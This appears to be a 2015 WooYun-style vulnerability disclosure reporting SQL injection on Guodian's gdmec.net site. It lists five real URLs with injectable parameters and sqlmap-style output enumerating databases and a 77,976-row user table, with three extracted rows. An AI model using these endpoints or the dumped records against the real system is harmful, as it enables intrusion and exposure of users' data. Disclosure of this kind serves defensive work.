2015-11-04: Details reported to the vendor; awaiting vendor response
2015-11-09: The vendor chose to ignore the vulnerability; details disclosed to the public
国电 (Guodian)
http://www.gdmec.net/phx/newsInfo.action?oid=1000333455&typeId=13&typeName=%E7%BD%91%E7%AB%99%E5%85%AC%E5%91%8A oid parameter injection
http://www.gdmec.net/phx/newsList.action?typeId=14&typeName=%E4%BA%A7%E5%93%81%E9%A2%91%E9%81%93 typeId parameter injection
http://www.gdmec.net/phx/newsDir.action?pid=2&ptypeName=%E7%89%A9%E8%B5%84%E9%9B%86%E5%9B%A2&typeName= pid parameter injection
http://www.gdmec.net/phx/newsInfo.action?oid=362416&pid=&typeId=14&ptypeName=&typeName=%E4%BA%A7%E5%93%81%E9%A2%91%E9%81%93&currentPage=1 oid parameter
http://www.gdmec.net/phx/newsList.action?pid=&typeId=13&ptypeName=&typeName=%E7%BD%91%E7%AB%99%E5%85%AC%E5%91%8A&currentPage= typeId parameter
available databases [28]:

Database: PHX3
[180 tables]

Database: PHX3
+-----------+---------+
| Table     | Entries |
+-----------+---------+
| PHX_USERS | 77976   |
+-----------+---------+
+-------+------+------+--------+---------+----------+----------+---------------------------+------------+------------+------------+------------+-------------+-------------+-------------+-------------+--------------+-----------------+------------------+--------------------+
| OID | NAME | ROLE | GENDER | COMPANY | USER_TEL | PASSWORD | USER_NAME | SELF_STYLE | USER_EMAIL | DEPARTMENT | RUN_STATUS | CREATE_DATE | USER_MOBILE | MODIFY_FLAG | DELETE_FLAG | USER_COMPANY | CODE_SPECIALITY | CERTIFICATE_TYPE | CERTIFICATE_NUMBER |
+-------+------+------+--------+---------+----------+----------+---------------------------+------------+------------+------------+------------+-------------+-------------+-------------+-------------+--------------+-----------------+------------------+--------------------+
| 68449 | NULL | NULL | NULL | 29205 | NULL | NULL | 29205 $ tsest1234 $ | 3 | NULL | NULL | 1 | 23-11月-09 | NULL | NULL | 1 | NULL | NULL | NULL | NULL |
| 69186 | NULL | NULL | NULL | 29532 | NULL | NULL | 29532 $ 平阳化工机械总厂 $ | 3 | NULL | NULL | 1 | 19-12月-09 | NULL | NULL | 1 | NULL | NULL | NULL | NULL |
| 47489 | NULL | NULL | NULL | 20464 | NULL | NULL | 20464 $ 四川爆破公司 $ | 3 | NULL | NULL | 1 | 18-9月 -07 | NULL | NULL | 1 | NULL | NULL | NULL | NULL |
Severity: No impact (ignored by vendor)
Ignored at: 2015-11-09 14:04
Vulnerability Rank: 4 (WooYun rating)
None yet